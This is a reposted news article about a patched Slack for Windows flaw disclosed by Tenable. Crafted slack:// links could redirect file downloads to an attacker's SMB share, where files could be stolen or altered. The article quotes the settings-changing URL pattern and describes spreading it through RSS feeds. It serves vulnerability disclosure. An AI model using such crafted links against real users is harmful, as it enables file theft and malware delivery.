科技动态

Slack patches vulnerability in Windows client that could be used to hijack files

微信扫一扫,分享到朋友圈

Slack patches vulnerability in Windows client that could be used to hijack files
0

Enlarge / Strangers in your Slack channel could have messed with Slack for Windows‘ download settings, redirecting files to a malicious shared folder. It’s fixed now.

NOAH BERGER/AFP/Getty Images

On May 17, researchers at Tenable revealed that they had discovered a vulnerability in the Windows version of the desktop application forSlack, the widely-used collaboration service. The vulnerability, in Slack Desktop version 3.3.7 for Windows, could have been used to change the destination of a file download from a Slack conversation to a remote file share owned by an attacker. This would allow the attacker not only to steal the files that were downloaded by a targeted user going forward, but it would potentially allow them to alter the files and add malware to them—that way when the victim opened the files, they would get a potentially nasty surprise.

Tenable reported the vulnerability to Slack via HackerOne. Slack has issued an update to the Windows desktop client that closes the vulnerability.

The potential attack used a weakness in the way the "slack://" protocol handler was implemented in the Windows application. By creating a crafted link posted in a Slack channel, the attacker could alter the default settings of the client—changing the download directory, for example, to a new location with a URL such as “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}”. That path could be directed to a Server Message Block (SMB) file sharing location controlled by the attacker. Once clicked, all future downloads would be dropped onto the attacker’s SMB server. This link could be disguised as a Web link—in a proof-of-concept, the malicious Slack attack posed as a link to Google.

Enlarge / A dissected view of a crafted Slack message with a malicious URL that changes the location where the Slack desktop application for Windows saves downloads.

In a blog post, Tenable’s David Wells reviewed several ways that this could be used maliciously. Once the attacker had changed the default download location, "the attacker could have not only stolen the document, but even inserted malicious code in it so that when opened by victim after download (through the Slack application), their machine would have been infected," Wells wrote.

An attacker wouldn’t even have to be a member of a Slack channel to successfully inject the URL, Wells noted—the link could be fed into a channel via an RSS feed, for example, as Slack channels can be set up to subscribe to them. "I could make a post to a very popular Reddit community that Slack users around the world are subscribed to," Wells explained. That post could include a Web link "that will redirect to our malicious slack:// link and change settings when clicked." However, this attack would likely throw up a dialog box warning that a Web link was trying to open Slack—so it wouldn’t work unless a victim clicked with approval.

阅读原文...


微信扫一扫,分享到朋友圈

Slack patches vulnerability in Windows client that could be used to hijack files
0

arstechnica

Weekly news: PWA Issue on iOS, Performance Culture, Anti-Tracking in Browsers

上一篇

Xamarin: Managing HTTP & Cleartext Traffic on Android with Network Security Configuration

下一篇

评论已经被关闭。

插入图片

热门分类

往期推荐

Slack patches vulnerability in Windows client that could be used to hijack files

长按储存图像,分享给朋友